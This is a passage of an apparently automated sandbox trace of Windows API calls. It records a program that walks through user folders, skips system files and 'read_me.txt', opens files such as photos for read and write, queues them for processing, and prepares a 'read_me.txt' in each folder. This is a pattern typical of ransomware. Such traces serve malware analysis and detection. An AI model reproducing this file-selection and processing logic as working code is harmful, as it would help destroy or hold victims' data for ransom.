[0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0079.072] GetProcessHeap () returned 0x280000 [0079.072] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0079.072] SetFilePointerEx (in: hFile=0x85c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.073] WriteFile (in: hFile=0x85c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0079.073] WriteFile (in: hFile=0x85c, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0079.073] GetProcessHeap () returned 0x280000 [0079.073] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0079.073] GetProcessHeap () returned 0x280000 [0079.073] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0079.073] GetProcessHeap () returned 0x280000 [0079.073] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0079.073] CloseHandle (hObject=0x85c) returned 1 [0079.074] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 54 [0079.074] GetProcessHeap () returned 0x280000 [0079.074] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40018 [0079.074] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned 41 [0079.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0079.074] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\.") returned 41 [0079.075] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0079.075] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\..") returned 42 [0079.075] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0079.075] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 51 [0079.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x858 [0079.075] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0079.075] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0079.075] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0079.075] CloseHandle (hObject=0x858) returned 1 [0079.075] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0079.075] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 51 [0079.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x858 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="read_me.txt") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="autoexec.bat") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="desktop.ini") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="autorun.inf") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="iconcache.db") returned 0x0 [0079.080] StrStrW (lpFirst="desktop.lnk", lpSrch="bootsect.bak") returned 0x0 [0079.081] StrStrW (lpFirst="desktop.lnk", lpSrch="boot.ini") returned 0x0 [0079.081] StrStrW (lpFirst="desktop.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0079.081] StrStrW (lpFirst="desktop.lnk", lpSrch="thumbs.db") returned 0x0 [0079.081] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 115 [0079.081] QueueUserWorkItem (Function=0x404e00, Context=0x858, Flags=0x0) returned 1 [0079.081] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0079.081] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0079.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="read_me.txt") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="autoexec.bat") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="desktop.ini") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="autorun.inf") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="iconcache.db") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="bootsect.bak") returned 0x0 [0079.081] StrStrW (lpFirst="downloads.lnk", lpSrch="boot.ini") returned 0x0 [0079.082] StrStrW (lpFirst="downloads.lnk", lpSrch="ntuser.dat.log") returned 0x0 [0079.082] StrStrW (lpFirst="downloads.lnk", lpSrch="thumbs.db") returned 0x0 [0079.082] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 116 [0079.082] QueueUserWorkItem (Function=0x404e00, Context=0x854, Flags=0x0) returned 1 [0079.082] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c3dcb0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0079.082] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt") returned 51 [0079.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x850 [0079.082] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0079.082] CloseHandle (hObject=0x850) returned 1 [0079.082] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0079.082] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0079.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x850 [0079.117] StrStrW (lpFirst="recentplaces.lnk", lpSrch="read_me.txt") returned 0x0 [0079.117] QueueUserWorkItem (Function=0x404e00, Context=0x850, Flags=0x0) returned 1 [0079.117] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="recentplaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0079.117] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0079.118] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\read_me.txt") returned 51 [0079.118] GetProcessHeap () returned 0x280000 [0079.118] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40018 | out: hHeap=0x280000) returned 1 [0079.118] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 66 [0079.118] GetProcessHeap () returned 0x280000 [0079.118] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a50088 | out: hHeap=0x280000) returned 1 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40018 [0079.119] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*") returned 48 [0079.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="recentplaces.lnk", cAlternateFileName="")) returned 0xffffffff [0079.119] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\read_me.txt") returned 58 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40018 | out: hHeap=0x280000) returned 1 [0079.119] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 67 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40018 [0079.119] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*") returned 43 [0079.119] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="recentplaces.lnk", cAlternateFileName="")) returned 0xffffffff [0079.119] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\read_me.txt") returned 53 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40018 | out: hHeap=0x280000) returned 1 [0079.119] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 68 [0079.119] GetProcessHeap () returned 0x280000 [0079.119] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0079.120] GetProcessHeap () returned 0x280000 [0079.120] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40018 [0079.120] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 44 [0079.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0079.120] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.") returned 44 [0079.120] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0079.121] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\..") returned 45 [0079.121] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0079.121] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x76c [0079.121] QueueUserWorkItem (Function=0x404e00, Context=0x76c, Flags=0x0) returned 1 [0079.121] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18661d80, ftCreationTime.dwHighDateTime=0x1d4c9c6, ftLastAccessTime.dwLowDateTime=0xb89832b0, ftLastAccessTime.dwHighDateTime=0x1d4d12e, ftLastWriteTime.dwLowDateTime=0xb89832b0, ftLastWriteTime.dwHighDateTime=0x1d4d12e, nFileSizeHigh=0x0, nFileSizeLow=0x29e1, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="J_k.jpg", cAlternateFileName="")) returned 1 [0079.121] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\J_k.jpg") returned 50 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\J_k.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j_k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0079.121] QueueUserWorkItem (Function=0x404e00, Context=0x780, Flags=0x0) returned 1 [0079.121] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7889f460, ftCreationTime.dwHighDateTime=0x1d4d4d0, ftLastAccessTime.dwLowDateTime=0x9929a0c0, ftLastAccessTime.dwHighDateTime=0x1d4d463, ftLastWriteTime.dwLowDateTime=0x9929a0c0, ftLastWriteTime.dwHighDateTime=0x1d4d463, nFileSizeHigh=0x0, nFileSizeLow=0x136a1, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="qu_3r.jpg", cAlternateFileName="")) returned 1 [0079.121] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qu_3r.jpg") returned 52 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qu_3r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qu_3r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e8 [0079.121] QueueUserWorkItem (Function=0x404e00, Context=0x8e8, Flags=0x0) returned 1 [0079.121] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0079.121] wnsprintfW (in: pszDest=0x8b40018, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt") returned 54 [0079.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x908 [0079.122] GetProcessHeap () returned 0x280000 [0079.122] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b20008 [0079.123] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\*") returned 63 [0079.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f1f510, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x16e9f2b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16e9f2b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0079.126] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\.") returned 63 [0079.126] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93f1f510, ftCreationTime.dwHighDateTime=0x1d4d302, ftLastAccessTime.dwLowDateTime=0x16e9f2b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16e9f2b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0079.126] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DM428cQYnNKRLC2AwQ\\..") returned 64 [0079.126] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0619de0, ftCreationTime.dwHighDateTime=0x1d4cacf, ftLastAccessTime.dwLowDateTime=0x661101a0, 